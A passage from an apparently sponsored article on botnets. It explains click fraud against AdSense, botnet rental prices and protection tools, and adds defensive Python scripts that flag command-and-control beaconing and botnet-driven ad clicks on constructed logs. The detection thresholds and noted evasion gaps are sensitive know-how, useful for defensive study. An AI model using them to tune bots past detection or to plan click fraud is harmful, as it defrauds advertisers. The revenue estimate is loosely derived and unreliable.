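# 192.0.2.12 polls an HTTPS server every ~5 min with small jitter,
# 192.0.2.11 is ordinary irregular web browsing.
SAMPLE_LOG = """\
2009-03-01T10:00:00 192.0.2.10 -> 198.51.100.5:6667
2009-03-01T10:00:00 192.0.2.12 -> 203.0.113.9:443
2009-03-01T10:00:07 192.0.2.11 -> 203.0.113.80:80
2009-03-01T10:01:00 192.0.2.10 -> 198.51.100.5:6667
2009-03-01T10:01:52 192.0.2.11 -> 203.0.113.80:80
2009-03-01T10:02:00 192.0.2.10 -> 198.51.100.5:6667
2009-03-01T10:03:00 192.0.2.10 -> 198.51.100.5:6667
2009-03-01T10:03:41 192.0.2.11 -> 203.0.113.80:80
2009-03-01T10:04:00 192.0.2.10 -> 198.51.100.5:6667
2009-03-01T10:05:10 192.0.2.12 -> 203.0.113.9:443
2009-03-01T10:07:30 192.0.2.11 -> 203.0.113.80:80
2009-03-01T10:09:55 192.0.2.12 -> 203.0.113.9:443
2009-03-01T10:15:05 192.0.2.12 -> 203.0.113.9:443
2009-03-01T10:20:00 192.0.2.12 -> 203.0.113.9:443
"""


def parse_log(text):
    """Yield (timestamp, src_ip, dst_ip, dst_port) from the constructed format."""
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, _arrow, dst_port = line.split()
        dst, port = dst_port.rsplit(":", 1)
        yield datetime.fromisoformat(ts), src, dst, int(port)


def find_beacons(text, min_connections=4, max_jitter=0.2):
    """Return {(src, dst, port): mean_interval_seconds} for flows with at
    least `min_connections` connections whose gaps vary by no more than
    `max_jitter` (standard deviation divided by the mean gap).

    The thresholds are assumptions; tune them to the environment's traffic.
    """
    flows = defaultdict(list)
    for ts, src, dst, port in parse_log(text):
        flows[(src, dst, port)].append(ts)

    beacons = {}
    for key, times in flows.items():
        if len(times) < min_connections:
            continue
        times.sort()
        gaps = [(later - earlier).total_seconds()
                for earlier, later in zip(times, times[1:])]
        avg = mean(gaps)
        # A coefficient of variation near zero means a metronome-like pattern.
        if avg > 0 and pstdev(gaps) / avg <= max_jitter:
            beacons[key] = avg
    return beacons


if __name__ == "__main__":
    for (src, dst, port), interval in sorted(find_beacons(SAMPLE_LOG).items()):
        print(f"{src} -> {dst}:{port} beacons every {interval:.0f}s")
```

Run against the constructed log, the two polling hosts are reported (60 s to the IRC port and 300 s to the HTTPS server) while the browsing host, whose gaps are irregular, is not. Real bots add jitter and change intervals, so this is a triage signal to combine with destination reputation and process context, not a verdict on its own.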

Online advertising companies operating under the PPC (Pay-per-Click) scheme pay for unique clicks on advertising links posted on the Internet. For botnet owners, defrauding such companies is a profitable business. Take, for example, the well-known Google AdSense network. Advertisers in it pay Google for clicks on the ads it places, hoping that the user who visits will buy something from them.

Google, in turn, posts contextual advertising on various sites participating in the AdSense program, paying the site owner a percentage of each click. Alas, not all website owners are honest. With a zombie network, a hacker can generate thousands of unique clicks per day, one from each machine, without arousing much suspicion from Google. Thus, the money spent on the advertising campaign will flow into the pocket of the hacker. Unfortunately, there has not yet been a single case where anyone has been held accountable for such actions. According to Click Forensics, in 2008, about 16-17% of all clicks on advertising links were fake, of which at least a third were generated by botnets. After performing simple calculations, you can understand that last year the owners of botnets “raked in” $33,000,000. Good income from mouse clicks!
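The fraud pattern described here, thousands of clicks per day with exactly one click from each zombie machine and no purchases behind them, is something an ad network or a publisher’s analytics team can score for. The following is an added example, not the article’s or Google’s own fraud detection; the click log format, the sample data and the scoring thresholds are constructed assumptions chosen to illustrate the idea.

```python
"""Score per-ad click logs for the botnet click-fraud signature described in
the article: many distinct machines, one click each, near-identical client
software, and no conversions.

Added example; the log format "<ad_id> <client_ip> <user_agent_id> <converted>"
and every value below are constructed for illustration.
"""
from collections import Counter, defaultdict

# Constructed click log. ad-1 receives eight clicks from eight addresses,
# all with the same user agent and no purchases; ad-2 shows ordinary traffic.
SAMPLE_CLICKS = """\
ad-1 192.0.2.1 ua-A 0
ad-1 192.0.2.2 ua-A 0
ad-1 192.0.2.3 ua-A 0
ad-1 192.0.2.4 ua-A 0
ad-1 192.0.2.5 ua-A 0
ad-1 192.0.2.6 ua-A 0
ad-1 192.0.2.7 ua-A 0
ad-1 192.0.2.8 ua-A 0
ad-2 198.51.100.1 ua-A 0
ad-2 198.51.100.2 ua-B 1
ad-2 198.51.100.1 ua-A 0
ad-2 198.51.100.3 ua-C 0
ad-2 198.51.100.4 ua-B 1
ad-2 198.51.100.5 ua-C 0
ad-2 198.51.100.4 ua-A 0
"""


def parse_clicks(text):
    """Yield (ad_id, client_ip, user_agent_id, converted) from the constructed format."""
    for line in text.splitlines():
        if line.strip():
            ad, ip, ua, conv = line.split()
            yield ad, ip, ua, conv == "1"


def score_ads(text, min_clicks=6, ua_share=0.8, ip_uniqueness=0.9):
    """Return per-ad statistics plus a `suspicious` flag.

    An ad is flagged when it has at least `min_clicks` clicks, almost every
    click comes from a different address (one click per zombie), one user
    agent accounts for at least `ua_share` of clicks (the same bot client on
    every machine) and nothing converts. Thresholds are assumptions.
    """
    per_ad = defaultdict(list)
    for ad, ip, ua, conv in parse_clicks(text):
        per_ad[ad].append((ip, ua, conv))

    report = {}
    for ad, clicks in per_ad.items():
        n = len(clicks)
        unique_ips = len({ip for ip, _, _ in clicks})
        top_ua_count = Counter(ua for _, ua, _ in clicks).most_common(1)[0][1]
        conversions = sum(1 for _, _, conv in clicks if conv)
        suspicious = (n >= min_clicks
                      and unique_ips / n >= ip_uniqueness
                      and top_ua_count / n >= ua_share
                      and conversions == 0)
        report[ad] = {
            "clicks": n,
            "unique_ips": unique_ips,
            "top_ua_share": top_ua_count / n,
            "conversions": conversions,
            "suspicious": suspicious,
        }
    return report


if __name__ == "__main__":
    for ad, stats in sorted(score_ads(SAMPLE_CLICKS).items()):
        print(ad, stats)
```

On the constructed log only ad-1 is flagged. In practice the same counters would be kept per publisher site and per day, and a flagged site would have its payouts held for review rather than being cut off automatically, since a legitimate campaign with poor conversions can look similar at low volume.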

Attackers and dishonest businessmen do not necessarily have to build a botnet from scratch themselves. Botnets of various sizes and capacities can be bought or rented from hackers, for example by turning to specialized forums.

The cost of a finished botnet, as well as the cost of renting it, directly depends on the number of computers included in it. Ready-made botnets are most popular on English-language forums.

Small botnets, consisting of several hundred bots, cost between $200 and $700. This puts the average price of one bot at approximately 50 cents. Larger botnets cost more.

The zombie network Shadow, which was created several years ago by a 19-year-old hacker from Holland, consisted of more than 100 thousand computers located around the world, and was sold for 25,000 euros. For this money you can buy a small house in Spain, but a criminal from Brazil chose to purchase a botnet.

Botnet Protection Tools

1. First of all, these are anti-virus programs and comprehensive packages for protection against Internet threats with regularly updated databases. They will help not only to detect danger in time, but also to eliminate it before your faithful “iron friend”, turned into a zombie, begins to send spam or “drop” sites. Comprehensive packages, such as Kaspersky Internet Security 2009, contain a full set of protective functions, which can be controlled through a common command center.

The antivirus module scans the most important system areas in the background and monitors all likely routes of infection: email attachments and potentially dangerous websites.

The firewall monitors communication between the personal computer and the Internet. It checks all data packets received from or sent to the network and, if necessary, blocks network attacks and prevents private data from being secretly sent over the Internet.

The spam filter keeps advertising messages out of the mailbox. It also identifies phishing emails, with which attackers try to extract the user’s login credentials for online payment or banking systems.

2. Regular updates of the operating system, web browsers and other applications, whose developers discover and close many gaps in their protection, including the weaknesses exploited by attackers.

3. Special encryption programs will protect your personal data even if a bot has already penetrated the computer, because to access the data the attacker will first have to crack the password.

4. Common sense and caution. If you want to protect your data from various types of threats, you should not download and install programs of unknown origin, open archives with files despite antivirus warnings, visit sites that your browser flags as dangerous, etc.

We thank Kaspersky Lab for their assistance in preparing the material